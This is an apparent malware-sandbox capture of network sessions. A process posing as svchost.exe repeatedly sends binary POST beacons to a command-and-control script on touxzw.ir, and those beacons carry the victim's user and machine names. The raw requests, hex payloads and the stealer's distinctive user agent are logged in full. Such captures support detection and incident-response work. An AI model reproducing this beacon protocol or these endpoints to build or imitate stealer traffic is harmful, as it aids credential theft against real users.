Feb 25, 2025 05:24:30.002439976 CET	836	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEXxG3FJSsRTzggNmilCMk8d4KE33J1WLpBRBx80oObjI9hYqt3p9F6nOvj6aF8VLlXbIF5147I5T3BdLR2M3PIfUKHms7gvBzp6ibJuBxlsjyRLRCeuU7j1JVw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed113e3e423e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49775	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:31.151612043 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:31.156773090 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:31.919231892 CET	852	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7uwUKSjkkkK9f4%2FLrp%2F5MMwFo23VMR3CxnHZO%2B8ZYjuabmoOJcdDeVjsrEEZBUgkwM3%2FbwK%2BrOQj%2F6j1TkJHU%2BDtU%2FwJADGcC5EKaBqVSR8dKnokd03bpE6NsyA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed1d298b18f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49791	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:33.103878021 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:33.109138012 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:33.812817097 CET	838	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:33 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1lQgird99XrlrdPWI8tKEPqAO2nghKAbH9RXpdWhAAxhuvfytLZ3%2B6VsMJ0M%2Be82TC%2F7q6pk1y%2B07pM7LyP%2B%2BOmBttV3%2FzYcJm%2B%2FrmkphBLL%2BfMvlCfK%2FG9%2BEY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed295a6415cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49803	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:34.964456081 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:34.969507933 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:35.717529058 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqqn0kZuKHcGQTjEvJ5cUOuTO4AXBAfefunaK0fSm%2BQpKakGyrerKbc6%2FovHQQ0Gz2dUCrfmLbKpB%2F7dAjfN%2FNhnBv6WOpZFJtgYW2qN4e7jueLXO9FVqtkcIXw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed350874728a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49818	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:36.886544943 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:36.891694069 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:37.619327068 CET	813	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:37 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rviwIQB4qtxweCfhNEA3xaYIEgj3homhuBZHGICqzF35P8WzcpAW1VScpzvdD4ntAbGDvyyCIu5oEMNSkulMG1WEDP4NbDfJD4IEqxX1ZYLDGkNQCgsXqxXEqbg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed410abbc463-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49830	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:38.775614977 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:38.780752897 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:39.493319988 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:39 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1CvkIaUszR%2FjaoVVeWHkyoHGYEefj%2Bx3TTAkTbbqXaTJoWL0xdeZBt1zTL0afUzGWk9l311aRw%2FHa2%2BAXbiD1gbD1eXiT8qzdqqLDq08bncokW3%2BCqi1sZMSjiY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed4cd84c43c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49845	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:40.649154902 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:40.654333115 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:41.416893005 CET	825	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:41 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTfKKLM4SbZr%2B6i80ZrufD8xJtZivDi5jmVmOV2CUWlYz9TLkgh7rPwB9JgTbWngk8i3duUXWKgqslOfae%2FzjRXNZKHvWBskt9%2BoX1T0LIWEYIM%2FGG2dUm%2BrB1o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed58cde1433f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2137&min_rtt=2137&rtt_var=1068&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49858	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:42.602026939 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:42.607101917 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:43.344516039 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:43 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2SP5koO3OfIzVvrlKndjiyEXTKY8Yqs5kNeauWFs37ZZ9%2FkMWkNf0F94lODSJSQ8MsVcLNEsA3qDmhyrGQaBUGZTOhSJeUvdY0uSygX31zsy5P4AVvTbPpRxk0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed64dba741ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1796&rtt_var=898&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49872	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:44.494901896 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:44.500109911 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:45.224410057 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:45 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKeWiKHLREqOtV7rGzsfjjcTWJqPGitaFzYaVVZv2ASbCUO%2BMs0dBB20fB7oea1MXqAN0c15km1MmB38xNZulwBWcraREVwFpvRSTa0mY6WkVqJjI%2BTidX3dXQU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed709a3642d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49885	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:46.374806881 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:46.379956961 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:46.993603945 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTv9vqflf%2Bdu7fODIo3ZHAz3lIVwjBzNW0N1airOy7tc%2BlCmTCv6l9Usu5Kd2OTpDmIqlJX8Ra5BbJTGNpXZ6d%2Fj%2B6st16a%2FFyxuA3N1LJWdtt6c0JSWcZNeodk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed7c58eec466-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3109&min_rtt=3109&rtt_var=1554&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49899	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:48.152407885 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:48.157567024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:48.884139061 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:48 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGUjMQkM%2Bk5Qc2fsBH7ZT2mmpDgXKovKJvDb2FlBMQ4WSaLRiv4g%2BDUIIkyFzP0b7Gtyf0MiHSMzjMQyG9HBz3V1piix%2Bp4gkkZggq1SMgZRXNoTdfEn8%2F5gaCU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed877a82432b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49910	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:50.057765007 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:50.062938929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:50.775299072 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:50 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DF2Z4bdF%2BrMv8vmgNLxfQr%2FRFfogJCUbPwwusIU3aW7sw%2BSz4aMtR0jeLkH9DlCpcKmOUancGkLuKV241Qw70Tl%2BJUbksqpIIrSE1eYwqwdtVE4HHVSD1DnlU2k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed935dad4407-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49926	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:51.938152075 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:51.944792986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:52.670548916 CET	823	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:52 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTTLObFUdy5g99jLNFmD2lJjP6SNHAJMFBet8k%2B8VUKJkHsWNO1S9VMTObC6iXP6fnPMa3eqfs%2FlgKEa58vr6R%2BPtyBxdDT2C51QNsRb6VU40Arho46cZC%2FaZNQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed9f1eaa431f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2886&min_rtt=2886&rtt_var=1443&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49937	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:53.823657990 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:53.828807116 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:54.581516981 CET	838	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7nbmIJdjCvJ1dy1rh4gcCTpBOywCBelJuKjJyFqIdyoTzNvxg5nRw5fzJMJdTujiUN%2B9OCkfyoy0v9MViRdKFj4hfkaTXhL5dTUBZ8oC4a5V5pQmwPToFI0NyC4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edaae9e44334-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49953	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:55.746699095 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
